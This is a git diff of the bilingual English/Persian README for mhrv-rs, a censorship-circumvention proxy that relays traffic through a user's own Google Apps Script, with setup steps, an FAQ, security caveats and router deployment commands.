-- [x] Per-site stats drill-down in the UI (requests, cache hit %, bytes, avg latency per host) for live debugging.
-- [x] Editable SNI rotation pool (UI window + `sni_hosts` config field) with per-name reachability probes (`mhrv-rs test-sni` CLI or **Test** / **Test all** / **Keep working only** buttons). DNS + TLS-handshake based, catches both DPI-blocked names and typos.
-- [x] OpenWRT / Alpine / musl builds — static binaries, procd init script included.
+**Is it safe?** The certificate stays on your computer — no one else has the private key. Your `auth_key` is your secret. Google sees the websites you visit through the relay (because Apps Script fetches them on your behalf) — same as any hosted proxy. If you're not OK with that, use Full Tunnel mode with your own VPS — see the [full guide](docs/guide.md#full-tunnel-mode).
 
-Intentionally **not** implemented (rationale included so future contributors don't spend cycles on them):
+**YouTube videos don't play.** YouTube's video chunks come from `googlevideo.com`, which Apps Script can't reach (Google blocks Apps Script from accessing Google's own video CDN). The page itself loads fine; only video playback is affected. Fix: Full Tunnel + VPS, or add `.googlevideo.com` to `passthrough_hosts` in your config (the browser then connects to it directly, but on Iranian ISPs that connection is still throttled).
 
-- **HTTP/2 multiplexing** — the `h2` crate state machine (stream IDs, flow control, GOAWAY) has too many subtle hang cases; coalescing + 20-connection pool already gets most of the benefit for this workload.
-- **Request batching (`q:[...]` mode)** — our connection pool + tokio async already parallelizes well; batching adds ~200 lines of state management with unclear incremental gain.
-- **Range-based parallel download** — edge cases (non-Range servers, chunked mid-stream, content-encoding) are real; YouTube-style video already bypasses Apps Script via SNI-rewrite tunnel.
-- **Other modes** (`domain_fronting`, `google_fronting`, `custom_domain`) — Cloudflare killed generic domain fronting in 2024; Cloud Run needs a paid plan. Skip unless specifically requested.
+**ChatGPT / Claude / Grok show a Cloudflare CAPTCHA.** Cloudflare flags Google datacenter IPs as bots. Fix: set up an **exit node** — a small TypeScript handler you deploy on a serverless host (Deno Deploy, fly.io) or your own VPS, which bridges Apps Script → your exit node → the target site (e.g. claude.ai). See [`assets/exit_node/README.md`](assets/exit_node/README.md).
 
-## Known limitations
+**Telegram is unstable.** Telegram uses MTProto, which Apps Script doesn't speak. Pair with [xray](https://github.com/XTLS/Xray-core) on your machine — see [Telegram via xray in the full guide](docs/guide.md#telegram-via-xray).
 
-These are inherent to the Apps Script + domain-fronting approach, not bugs in this client. The original Python version has the same issues.
+**ISP blocks `script.google.com` itself.** mhrv-rs has a `direct` mode that uses only the SNI-rewrite tunnel (no Apps Script). Use it once to reach `script.google.com` and deploy your script, then switch to `apps_script` mode. See [direct mode](docs/guide.md#direct-mode).
 
-- **User-Agent is fixed to `Google-Apps-Script`** for anything going through the relay. `UrlFetchApp.fetch()` does not allow overriding it. Consequence: sites that detect bots (e.g., Google search, some CAPTCHA flows) serve degraded / no-JS fallback pages to relayed requests. Workaround: add the affected domain to the `hosts` map so it's routed through the SNI-rewrite tunnel with your real browser's UA instead. `google.com`, `youtube.com`, `fonts.googleapis.com` are already there by default.
-- **Video playback is slow and quota-limited** for anything that goes through the relay. YouTube HTML loads through the tunnel (fast), but chunks from `googlevideo.com` go through Apps Script. Each Apps Script consumer account has a ~2 M `UrlFetchApp` calls/day quota and a 50 MB body limit per fetch. Fine for text browsing, painful for 1080p. Rotate multiple `script_id`s for more headroom, or use a real VPN for video.
-- **Brotli is stripped** from forwarded `Accept-Encoding` headers. Apps Script can decompress gzip, but not `br`, and forwarding `br` produces garbled responses. Minor size overhead.
-- **WebSockets don't work** through the relay — it's single request/response JSON. Sites that upgrade to WS fail (ChatGPT streaming, Discord voice, etc.).
-- **HSTS-preloaded / hard-pinned sites** will reject the MITM cert. Most sites are fine because the CA is trusted; a handful aren't.
-- **Google / YouTube 2FA and sensitive logins** may trigger "unrecognized device" warnings because requests originate from Google's Apps Script IPs, not yours. Log in once via the tunnel (`google.com` is in the rewrite list) to avoid this.
+**My Google search shows up without JavaScript.** The Apps Script `User-Agent` is fixed to `Google-Apps-Script` (Google won't let scripts change it), so some sites serve a no-JS fallback. Workaround: add the affected domain to your `hosts` map so it goes through the SNI-rewrite tunnel with your real browser User-Agent. `google.com`, `youtube.com`, `fonts.googleapis.com` are already on this list by default.
 
-## Security posture
+**More questions:** [full FAQ in the long guide](docs/guide.md#faq).
 
-- The MITM root stays **on your machine only**. The `ca/ca.key` private key is generated locally and never leaves the user-data dir.
-- `auth_key` between the client and the Apps Script relay is a shared secret you pick. The server-side `Code.gs` rejects requests without a matching key.
-- Traffic between your machine and Google's edge is standard TLS 1.3.
-- What Google can see: the destination URL and headers of each request (because Apps Script fetches on your behalf). This is the same trust model as any hosted proxy — if that's not acceptable, use a self-hosted VPN instead.
-- **IP exposure caveat (`apps_script` mode):** v1.2.9 strips every `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` and ~10 related identity-revealing headers from your outbound request before it reaches Apps Script (issue #104). What this **does not** cover: whatever Google's own infrastructure may add when its Apps Script runtime makes the subsequent `UrlFetchApp.fetch()` to the target site. That second leg is server-side, outside this client's control — so the destination server sees a Google datacenter IP, but there is no public guarantee Google never propagates the original caller's IP in some internal header chain. If your threat model requires that the destination site cannot under any circumstances learn your IP, **use Full Tunnel mode** (traffic exits from your own VPS, only the VPS IP is exposed end-to-end). `apps_script` mode remains fine for bypassing DPI / reaching blocked sites where "seen by Google" is acceptable. Raised in [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+## Need help?
 
-## License
+- Search [open and closed issues](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues?q=is%3Aissue) — your problem might already be answered
+- Open a [new issue](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/new) with: your config (mask `auth_key`!), exactly what you tried, exactly what you saw in the log
 
-MIT. See [LICENSE](LICENSE).
+## Credits
 
-## Credit
+Original project: **[@masterking32/MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN)**. The idea, the Apps Script protocol, the proxy architecture — all his. This Rust port exists to make client-side distribution easier (single binary, no Python install).
 
-Original project: <https://github.com/masterking32/MasterHttpRelayVPN> by [@masterking32](https://github.com/masterking32). The idea, the Google Apps Script protocol, the proxy architecture, and the ongoing maintenance are all his. This Rust port exists purely to make client-side distribution easier.
+Most of the Rust code in this port was written with [Anthropic's Claude](https://claude.com), reviewed by a human on every commit.
 
 ## Support this project
 
-If `mhrv-rs` has been useful to you and you'd like to support continued development:
-
-### [❤️ Support on sh1n.org](https://sh1n.org/donate)
-
-Donations cover hosting, self-hosted CI runner costs, and continued maintenance. Starring the repo also helps signal that the project is worth keeping alive.
+[❤️ Donate at sh1n.org](https://sh1n.org/donate) — covers hosting and CI runner costs. Starring the repo also helps signal the project is worth keeping alive.
 
 ---
 
 <div dir="rtl">
 
-## راهنمای فارسی
-
-### این ابزار چیست؟
-
-یک پروکسی کوچک که روی سیستم خودتان اجرا می‌شود و ترافیک شما را از طریق یک اسکریپت رایگان که در حساب گوگل خودتان می‌سازید، عبور می‌دهد. `ISP` شما فقط یک اتصال `HTTPS` ساده به `www.google.com` می‌بیند و اجازه می‌دهد رد شود؛ در پشت پرده، اسکریپتی که خودتان منتشر می‌کنید سایت مقصد را برای شما می‌خواند و پاسخ را بازمی‌گرداند.
-
-این نسخهٔ `Rust` از پروژهٔ اصلی [MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN) اثر [@masterking32](https://github.com/masterking32) است. **تمام اعتبار ایده و نسخهٔ اصلی پایتون برای ایشان است.** این پورت همان روش را در قالب یک فایل اجرایی تک‌پارچه (~۳ مگابایت) بدون نیاز به نصب پایتون یا هیچ وابستگی دیگری ارائه می‌دهد.
-
-> **نکتهٔ مهم دربارهٔ نویسندگی:** بیشتر کدِ این پورت `Rust` با کمک [Claude](https://claude.com) شرکت Anthropic نوشته شده و روی هر commit توسط انسان بازبینی شده است. اگر باگی دیدید یا پیشنهادی دارید، لطفاً در [صفحهٔ issues](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues) گزارش دهید.
-
-### برای چه کسی مفید است؟
-
-- کسانی که در شبکه‌های تحت سانسور قوی (مثل ایران) زندگی می‌کنند
-- کسی که می‌خواهد بدون `VPN` تجاری، بدون نصب پایتون، و بدون پرداخت پول عبور کند
-- کسی که حتی یک حساب گوگل رایگان دارد
-
-### چه چیز لازم دارید؟
-
-۱. یک حساب گوگل (همان `Gmail` رایگان کافیست)  
-۲. مرورگر (`Firefox`، `Chrome`، `Edge`، …) یا برنامه‌ای که `HTTP proxy` یا `SOCKS5` قبول کند  
-۳. دسترسی به سیستم خودتان (مک / لینوکس / ویندوز)  
-
-### پنج مرحله برای راه‌اندازی
-
-#### مرحلهٔ ۱ — ساخت اسکریپت در گوگل (فقط یک بار)
-
-۱. به <https://script.google.com> بروید و با حساب گوگل خودتان وارد شوید  
-۲. روی **`New project`** کلیک کنید و کد پیش‌فرض را پاک کنید  
-۳. محتوای فایل [`Code.gs`](https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs) را از ریپوی اصلی کپی کنید و داخل ویرایشگر بچسبانید. اگر به آدرس بالا دسترسی ندارید، یک کپی از همین فایل داخل این ریپو هم هست: [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs)  
-۴. بالای کد، خط `const AUTH_KEY = "..."` را پیدا کنید و مقدار آن را به یک رمز قوی و خاص خودتان تغییر دهید (یک رشتهٔ تصادفی حداقل ۱۶ کاراکتری کافی است، مثلاً `aK8f3xM9pQ2nL5vR`)  
-۵. روی دکمهٔ آبی **`Deploy`** در بالا سمت راست کلیک کنید و **`New deployment`** را بزنید  
-۶. **`Type`** را روی **`Web app`** بگذارید و این تنظیمات را اعمال کنید:  
-- **`Execute as`**: **`Me`**  
-- **`Who has access`**: **`Anyone`**
-
-۷. روی **`Deploy`** کلیک کنید. گوگل یک **`Deployment ID`** نشان می‌دهد — رشتهٔ طولانی تصادفی که داخل آدرس `URL` است. کپی‌اش کنید؛ در برنامه لازم دارید  
-
-> **نکته:** اگر نمی‌دانید رمز `AUTH_KEY` چه بگذارید، یک رشتهٔ تصادفی ۱۶ تا ۲۴ کاراکتری بسازید. مهم فقط این است که **دقیقاً همان رشته** را در برنامه هم وارد کنید.
-
-#### به `script.google.com` هم دسترسی ندارید؟
-
-اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت بوت‌استرپ کوچک دقیقاً برای همین دارد: `google_only`.
-
-۱. برنامه را طبق مرحلهٔ ۲ پایین دانلود کنید
-
-۲. فایل [`config.google-only.example.json`](config.google-only.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key`
-
-۳. برنامه را اجرا کنید و `HTTP proxy` مرورگرتان را روی `127.0.0.1:8085` تنظیم کنید
-
-۴. در حالت `google_only`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل را از طریق همان تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست
-
-۵. حالا مرحلهٔ ۱ را در مرورگر انجام دهید (اتصال به `script.google.com` با `SNI` فرونت می‌شود). `Code.gs` را مستقر کنید و `Deployment ID` را کپی کنید
-
-۶. در `UI` دسکتاپ یا اندروید (یا با ویرایش `config.json`) حالت را به `apps_script` برگردانید، `Deployment ID` و `auth_key` را بچسبانید و برنامه را دوباره راه‌اندازی کنید
-
-برای بررسی قابلیت دسترسی قبل از راه‌اندازی پروکسی: دستور `mhrv-rs test-sni` دامنه‌های `*.google.com` را مستقیماً تست می‌کند و فقط به `google_ip` و `front_domain` نیاز دارد.
-
-#### مرحلهٔ ۲ — دانلود برنامه
-
-به [صفحهٔ Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases) بروید و آرشیو مناسب سیستم‌عامل خود را دانلود و از حالت فشرده خارج کنید:
-
-| سیستم‌عامل | فایل مناسب |
-|---|---|
-| مک اپل‌سیلیکون (`M1` / `M2` / …) | `mhrv-rs-macos-arm64-app.zip` (قابل دوبار کلیک در `Finder`) |
-| مک اینتل | `mhrv-rs-macos-amd64-app.zip` |
-| ویندوز | `mhrv-rs-windows-amd64.zip` |
-| لینوکس معمولی (اوبونتو، مینت، دبیان، فدورا، آرچ، …) | `mhrv-rs-linux-amd64.tar.gz` |
-| لینوکس روی روتر (`OpenWRT`) یا `Alpine` | `mhrv-rs-linux-musl-amd64.tar.gz` |
-
-> اگر نمی‌دانید مک شما `M1/M2` است یا اینتل: منوی اپل → `About This Mac` → در خط **`Chip`** اگر **`Apple`** نوشته شده، `arm64` بگیرید؛ اگر **`Intel`**، `amd64`.  
-
-> کاربران اوبونتو ۲۰.۰۴ یا سیستم‌های خیلی قدیمی که خطای `GLIBC not found` می‌گیرند: آرشیو `linux-musl-amd64` را دانلود کنید — اجرا می‌شود.  
-#### مرحلهٔ ۳ — اجرای بار اول (نصب گواهی محلی)
-
-برای اینکه برنامه بتواند ترافیک `HTTPS` مرورگر شما را باز کند و از طریق `Apps Script` رد کند، یک گواهی امنیتی کوچک **روی سیستم خودتان** می‌سازد و به سیستم‌عامل می‌گوید به آن اعتماد کند.
-
-**کاری که باید بکنید (خودکار است):**
+# mhrv-rs — دور زدن سانسور به‌رایگان، با حساب گوگل خودت
 
-| سیستم‌عامل | روش |
-|---|---|
-| مک | روی `run.command` دو بار کلیک کنید |
-| ویندوز | روی `run.bat` دو بار کلیک کنید |
-| لینوکس | در ترمینال دستور `./run.sh` را اجرا کنید |
-
-**فقط یک بار** رمز سیستم (`sudo` در مک/لینوکس یا `UAC` در ویندوز) می‌خواهد تا گواهی را نصب کند. بعد از آن برنامه باز می‌شود و در اجراهای بعدی می‌توانید مستقیماً از فایل اصلی (`mhrv-rs.app` در مک، `mhrv-rs-ui.exe` در ویندوز) استفاده کنید.
-
-**امنیت این گواهی:**
-
-- گواهی **کاملاً روی سیستم شما** ساخته می‌شود. کلید خصوصی هیچ‌وقت از کامپیوترتان خارج نمی‌شود
-- هیچ سرور راه دوری — از جمله خود گوگل — نمی‌تواند با این گواهی خودش را جای سایت‌ها جا بزند
-- هر وقت خواستید می‌توانید گواهی را حذف کنید (بخش **[حذف گواهی](#سوالات-رایج)** را ببینید)
-
-> **اگر نمی‌خواهید از اسکریپت راه‌انداز استفاده کنید**، می‌توانید مرحلهٔ گواهی را دستی انجام دهید:
->
-> - مک/لینوکس: `sudo ./mhrv-rs --install-cert`
-> - ویندوز (با `Run as administrator`): `mhrv-rs.exe --install-cert`
-
-#### مرحلهٔ ۴ — تنظیمات در برنامه
-
-پنجرهٔ برنامه باز می‌شود. این فیلدها را پر کنید:
-
-| فیلد | مقدار |
-|---|---|
-| **`Apps Script ID(s)`** | همان `Deployment ID` مرحلهٔ ۱ را paste کنید |
-| **`Auth key`** | همان رمز `AUTH_KEY` که داخل `Code.gs` گذاشتید |
-| **`Google IP`** | پیش‌فرض `216.239.38.120` معمولاً خوب است. دکمهٔ `scan` کنارش IPهای دیگر گوگل را تست می‌کند و سریع‌ترین را نشان می‌دهد |
-| **`Front domain`** | پیش‌فرض `www.google.com` را نگه دارید |
-| **`HTTP port`** / **`SOCKS5 port`** | پیش‌فرض‌های `8085` و `8086` خوب‌اند |
-
-بعد روی **`Save config`** و سپس **`Start`** کلیک کنید. هر وقت خواستید وضعیت را تست کنید، دکمهٔ **`Test`** را بزنید — یک درخواست کامل می‌فرستد و نتیجه را نشان می‌دهد.
+**یک برنامهٔ کوچک که روی کامپیوترت اجرا می‌شود و کمک می‌کند سایت‌های مسدودشده را با یک اسکریپت رایگان که توی حساب گوگل خودت می‌سازی، باز کنی. ISP فقط می‌بیند که داری به `www.google.com` وصل می‌شوی — نمی‌فهمد در واقع چه سایتی را باز کرده‌ای.**
 
-#### مرحلهٔ ۵ — تنظیم مرورگر یا اپلیکیشن
+🇬🇧 [English Quick Start](#quick-start) · [Full Guide (advanced)](docs/guide.md)
+🇮🇷 [راه‌اندازی سریع](#راه‌اندازی-سریع) · [راهنمای کامل (پیشرفته)](docs/guide.fa.md)
 
-برنامه روی دو پورت منتظر است:
+## چی به دست می‌آوری
 
-- **`HTTP proxy`** روی `127.0.0.1:8085` — برای مرورگرها
-- **`SOCKS5 proxy`** روی `127.0.0.1:8086` — برای تلگرام / `xray` / بقیهٔ اپلیکیشن‌ها
+- 🌐 **عبور از DPI / مسدودسازی SNI** با لبهٔ گوگل به‌عنوان رله
+- 💯 **کاملاً رایگان** — روی سهمیهٔ رایگان حساب گوگل خودت
+- ⚡ **یک فایل کوچک** (~۳ مگابایت)، بدون پایتون، بدون Node.js، بدون وابستگی
+- 🖥️ **روی** مک، ویندوز، لینوکس، اندروید، روتر OpenWRT کار می‌کند
+- 🦊 **هر مرورگر یا برنامه‌ای** که از HTTP proxy یا SOCKS5 پشتیبانی کند
 
-**فایرفاکس (ساده‌ترین):**
+## چطور کار می‌کند (تصویر ساده)
 
-
-#### پیکربندی scan-ips (اختیاری)
-به‌طور پیش‌فرض، دستور scan-ips از آرایه‌ای ثابت از IPها استفاده می‌کند.
-
-می‌توانید کشف پویای IP را با تنظیم fetch_ips_from_api روی true در config.json فعال کنید:
-
-```json
-{
-  "fetch_ips_from_api": true,
-  "max_ips_to_scan": 100,
-  "scan_batch_size":100,
-  "google_ip_validation": true // برسی هدر های بازگشته از ایپی برای برسی هدر ها و تشخیص کاربردی بودن ایپی
-}
 ```
-
-زمانی که فعال باشد:
-
-- فایل goog.json را از API محدوده‌های عمومی IP گوگل دریافت می‌کند
-تمام CIDRها را استخراج کرده و به IPهای جداگانه تبدیل می‌کند
-- به IPهای دامنه‌های معروف گوگل (google.com، youtube.com و غیره) اولویت می‌دهد
-به‌صورت تصادفی تا max_ips_to_scan کاندید انتخاب می‌کند (ابتدا IPهای اولویت‌دار)
-فقط کاندیدهای انتخاب‌شده را برای اتصال و اعتبارسنجی frontend تست می‌کند.
-
-با استفاده از این گزینه‌ها ممکن است IPهایی پیدا کنید که سریع‌تر از آرایه ثابت پیش‌فرض هستند اما تضمینی وجود ندارد که این IPها کار کنند.
-
-#### ۵. تنظیم proxy در کلاینت
-۱. منوی `Settings` را باز کنید، در خانهٔ جست‌وجو عبارت `proxy` را تایپ کنید  
-۲. روی **`Network Settings`** کلیک کنید  
-۳. گزینهٔ **`Manual proxy configuration`** را انتخاب کنید  
-۴. در فیلد **`HTTP Proxy`** آدرس `127.0.0.1` و پورت `8085` را بگذارید  
-۵. تیک **`Also use this proxy for HTTPS`** را بزنید  
-۶. `OK`  
-**کروم یا Edge:** از تنظیمات `proxy` سیستم‌عامل استفاده می‌کنند. ساده‌ترین راه نصب افزونهٔ **`Proxy SwitchyOmega`** و تنظیم آن روی `127.0.0.1:8085` است.
-
-**تلگرام:**
-
-۱. `Settings` → `Advanced` → `Connection type`
-۲. **`Use custom proxy`** → **`SOCKS5`**
-۳. هاست `127.0.0.1`، پورت `8086`، نام کاربری و رمز را خالی بگذارید
-۴. `Save` بزنید
-
-> **نکتهٔ مهم دربارهٔ تلگرام:** اگر فقط این ابزار را استفاده کنید، تلگرام ممکن است مرتب قطع و وصل شود، چون `Apps Script` پروتکل `MTProto` تلگرام را نمی‌فهمد. برای پایداری کامل تلگرام، بخش [**تلگرام پایدار با xray**](#تلگرام-و-غیره--جفت-کردن-با-xray) را ببینید.
-
-### از کجا بفهمم کار می‌کند؟
-
-۱. در پنجرهٔ برنامه، وضعیت باید **`Status: running`** باشد (سبز رنگ)
-۲. دکمهٔ **`Test`** را بزنید — اگر سبز شد، سرویس سالم است
-۳. در مرورگر به <https://icanhazip.com> بروید — `IP` نمایش داده‌شده باید متفاوت از `IP` واقعی شما باشد (آی‌پی گوگل)
-۴. اگر مشکلی بود، پنل **`Recent log`** پایین برنامه را نگاه کنید
-
-### تلگرام و غیره — جفت کردن با xray
-
-‏ `Apps Script` فقط `HTTP` می‌فهمد، پس پروتکل‌های دیگر (مثل `MTProto` تلگرام، `IMAP` ایمیل، `SSH`، …) مستقیماً از آن رد نمی‌شوند. نتیجه: اگر `ISP` تلگرام را با `DPI` بلاک کرده باشد، همچنان بلاک است.  
-**راه‌حل:** یک [`xray`](https://github.com/XTLS/Xray-core) (یا `v2ray` یا `sing-box`) روی سیستم خودتان اجرا کنید که با `VLESS` / `Trojan` / `Shadowsocks` به یک سرور `VPS` شخصی وصل می‌شود. بعد در برنامهٔ `mhrv-rs`، فیلد **`Upstream SOCKS5`** را با آدرس `xray` پر کنید (مثلاً `127.0.0.1:50529`).
-
-بعد از این کار، ترافیکی که `HTTP` نیست (مثل تلگرام) از `xray` عبور می‌کند و به سرور شما می‌رسد. ترافیک `HTTP/HTTPS` مثل قبل از `Apps Script` می‌رود، پس مرورگر شما دست نخورده کار می‌کند.
-
-```json
-{
-  "upstream_socks5": "127.0.0.1:50529"
-}
+  تو  ←  مرورگر  ←  mhrv-rs  ──┐
+                                │ ISP فقط می‌بیند:  www.google.com
+                                ▼
+                         شبکهٔ گوگل
+                                │
+                                ▼
+            اسکریپت رایگان گوگل تو  سایت اصلی را  باز می‌کند
+                                │
+                                ▼
+              توییتر / ChatGPT / هر سایت مسدودی
 ```
 
-### ویرایشگر SNI pool
-
-به‌صورت پیش‌فرض برنامه بین چند نام گوگل می‌چرخد (`www.google.com`، `mail.google.com`، `drive.google.com`، `docs.google.com`، `calendar.google.com`) تا اثر انگشت ترافیک شما یکنواخت نباشد. اما بعضی از این نام‌ها گاهی در شبکهٔ شما بلاک می‌شوند — مثلاً `mail.google.com` در ایران چند بار هدف قرار گرفته.
-
-**برای بررسی و ویرایش:**
+ISP داخل HTTPS رمزشده را نمی‌تواند بخواند. فقط آدرس را می‌بیند — `www.google.com`. جست‌وجوی واقعی صفحه داخل شبکهٔ گوگل، در تونل رمزشده اتفاق می‌افتد.
 
-۱. روی دکمهٔ آبی **`SNI pool…`** در برنامه کلیک کنید
-۲. دکمهٔ **`Test all`** را بزنید — هر نام را تست می‌کند و نتیجه را کنارش نشان می‌دهد (`ok` یا `fail`)
-۳. دکمهٔ **`Keep working only`** را بزنید — همه نام‌هایی که پاسخ ندادند را غیرفعال می‌کند
-۴. اگر نام جدیدی می‌خواهید اضافه کنید، در کادر پایین نام را بنویسید و **`+ Add`** بزنید — خودکار تست می‌شود
-۵. با **`Save config`** در پنجرهٔ اصلی ذخیره کنید
+## راه‌اندازی سریع
 
-### حالت تونل کامل (Full tunnel mode)
+**حدود ۵ دقیقه.** نیاز داری به:
 
-حالت `"mode": "full"` **تمام** ترافیک را سرتاسر از طریق `Apps Script` و یک [tunnel-node](tunnel-node/) روی سرور شما عبور می‌دهد — **بدون نیاز به نصب گواهی `MITM`**. تنها هزینه‌اش تأخیر بیشتر است (هر بایت از مسیر `Apps Script → tunnel-node → مقصد` می‌رود)، اما برای هر پروتکل و هر برنامه بدون نصب `CA` کار می‌کند.
+- یک حساب گوگل رایگان (هر Gmail‌ای کار می‌کند)
+- یک کامپیوتر (مک، ویندوز یا لینوکس)
+- فایرفاکس یا کروم
 
-**سریع‌ترین راه راه‌اندازی `tunnel-node` روی `VPS`:** ایمیج آمادهٔ `Docker`:
+### مرحلهٔ ۱ — ساخت اسکریپت گوگل (یک‌بار)
 
-```bash
-docker run -d --name mhrv-tunnel --restart unless-stopped \
-  -p 8080:8080 -e TUNNEL_AUTH_KEY=رمز_قوی_شما \
-  ghcr.io/therealaleph/mhrv-tunnel-node:latest
-```
+1. به **[script.google.com](https://script.google.com)** برو، با حساب گوگل خودت وارد شو
+2. روی **New project** بالا سمت چپ کلیک کن
+3. کد پیش‌فرض ویرایشگر را پاک کن
+4. فایل [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) را در همین ریپو باز کن، همه‌اش را کپی کن، در ویرایشگر Apps Script پیست کن (جایگزین متن قبلی)
+5. این خط را نزدیک بالای کد پیدا کن:
+   ```js
+   const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+   ```
+   مقدار `CHANGE_ME_TO_A_STRONG_SECRET` را با یک رشتهٔ تصادفی طولانیِ خودت عوض کن. **این رشته را نگه دار** — در مرحلهٔ ۳ داخل برنامه پیست می‌کنی. مثل پسورد محرمانه نگه‌اش دار.
+6. روی 💾 **Save** کلیک کن (یا `Ctrl/Cmd+S`)
+7. روی **Deploy** (بالا سمت راست) → **New deployment**
+8. روی آیکون چرخ‌دندهٔ ⚙ کنار "Select type" کلیک کن → **Web app** را انتخاب کن
+9. تنظیم کن:
+   - **Execute as:** *Me* (حساب گوگل خودت)
+   - **Who has access:** *Anyone*
+10. **Deploy** را بزن. ممکن است گوگل برای دادن دسترسی سؤال کند — **Authorize access** را بزن و تأیید کن
+11. گوگل یک **Deployment ID** نشانت می‌دهد (یک رشتهٔ تصادفی طولانی). **کپی‌اش کن** — در مرحلهٔ ۳ لازم داری.
 
-`multi-arch` (هم `linux/amd64` و هم `linux/arm64`)، اجرا با کاربر غیر `root`، حدود ۳۲ مگابایت فشرده. برای محیط production نسخهٔ مشخص (`:1.5.0`) را pin کنید. راهنمای کامل (شامل `Cloud Run`، `docker-compose`، و بیلد از سورس) در [`tunnel-node/README.md`](tunnel-node/README.md) هست.
+> **نکته:** اگر بعداً `Code.gs` را به‌روزرسانی کنی، Deployment جدید نساز. کد را ویرایش کن، بعد **Deploy → Manage deployments → ✏️ → Version: New version → Deploy**. Deployment ID همان قبلی می‌ماند.
 
-#### چرا تعداد `Deployment ID` مهم است؟
+### مرحلهٔ ۲ — دانلود mhrv-rs
 
-هر درخواست دسته‌ای (`batch`) به `Apps Script` حدود ۲ ثانیه طول می‌کشد. در حالت `full`، برنامه یک **لولهٔ موازی** (`pipeline`) اجرا می‌کند که چند درخواست دسته‌ای را همزمان می‌فرستد بدون اینکه منتظر پاسخ قبلی بماند. هر `Deployment ID` (= یک حساب گوگل) حوضچهٔ همزمانی مخصوص خودش با **۳۰ درخواست همزمان** دارد — مطابق سقف اجرای همزمان `Apps Script` به ازای هر حساب.
+به [صفحهٔ آخرین release](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) برو و فایل مناسب کامپیوترت را دانلود کن:
 
-```
-حداکثر همزمانی = ۳۰ × تعداد Deployment IDها
-```
+| سیستم تو | فایل دانلود |
+|---|---|
+| مک با تراشهٔ Apple Silicon (M1 / M2 / M3 / M4) | `mhrv-rs-macos-arm64-app.zip` |
+| مک با تراشهٔ Intel | `mhrv-rs-macos-amd64-app.zip` |
+| ویندوز | `mhrv-rs-windows-amd64.zip` |
+| لینوکس (Ubuntu / Mint / Fedora / Debian / Arch) | `mhrv-rs-linux-amd64.tar.gz` |
+| گوشی یا تبلت اندروید | `mhrv-rs-android-universal-v*.apk` |
+| روتر OpenWRT یا Alpine | `mhrv-rs-linux-musl-amd64.tar.gz` |
 
-| تعداد Deployment | درخواست‌های همزمان | |
-|-----------------|-------------------|---|
-| ۱ | ۳۰ | یک حساب — برای مرور سبک کافیست |
-| ۳ | ۹۰ | مناسب استفادهٔ روزانه |
-| ۶ | ۱۸۰ | توصیه‌شده برای استفادهٔ سنگین |
-| ۱۲ | ۳۶۰ | چند حساب — حداکثر توان |
+> **مک: مطمئن نیستی Apple Silicon است یا Intel؟** روی منوی اپل (گوشهٔ بالای صفحه) کلیک کن → **About This Mac**. اگر "Chip" نوشت **Apple**، arm64 بگیر. اگر **Intel** بود، amd64.
 
-بیشتر `Deployment` = بیشتر همزمانی = تأخیر کمتر برای هر نشست. هر دسته بین `ID`ها چرخش می‌کند (`round-robin`)، پس بار به‌طور یکنواخت توزیع می‌شود.
+> **لینوکس: خطای `GLIBC` می‌گیری؟** به‌جای آن از `linux-musl-amd64` استفاده کن — روی هر لینوکسی بدون وابستگی کار می‌کند.
 
-### اجرا روی OpenWRT (روتر)
+از حالت فشرده دربیار.
 
-اگر می‌خواهید برنامه را روی روترتان اجرا کنید تا همهٔ دستگاه‌های شبکه از آن استفاده کنند، آرشیو `mhrv-rs-linux-musl-*.tar.gz` را دانلود کنید (این نسخه فایل اجرایی استاتیک دارد و بدون نصب هیچ وابستگی روی روتر کار می‌کند).
+### مرحلهٔ ۳ — اجرای اول
 
-```sh
-# از کامپیوتری که به روترتان دسترسی دارد:
-scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
-scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
-scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+روی فایل اجرا دو بار کلیک کن:
 
-# روی خود روتر (ssh کنید به روتر):
-chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
-/etc/init.d/mhrv-rs enable
-/etc/init.d/mhrv-rs start
-logread -e mhrv-rs -f
-```
+- مک: `run.command`
+- ویندوز: `run.bat`
+- لینوکس: `./run.sh` (در ترمینال)
 
-در فایل `config.json`، مقدار `listen_host` را به `0.0.0.0` تغییر دهید تا روتر از همهٔ دستگاه‌های `LAN` اتصال بپذیرد. بعد در هر دستگاه، `HTTP proxy` را روی آی‌پی روتر پورت `8085` (یا `SOCKS5` روی `8086`) تنظیم کنید.
+اولین بار رمز کامپیوترت را می‌خواهد. این برای نصب یک گواهی کوچک است تا مرورگرت به mhrv-rs اعتماد کند. **گواهی روی کامپیوتر خودت ساخته می‌شود و هیچ‌وقت جایی ارسال نمی‌شود** — نه روی ابر، نه به گوگل، هیچ منبع راه‌دوری نمی‌تواند ازش استفاده کند.
 
-مصرف حافظه حدود ۱۵ تا ۲۰ مگابایت است — روی هر روتری با حداقل ۱۲۸ مگابایت `RAM` اجرا می‌شود.
+پنجرهٔ mhrv-rs باز می‌شود. این فیلدها را پر کن:
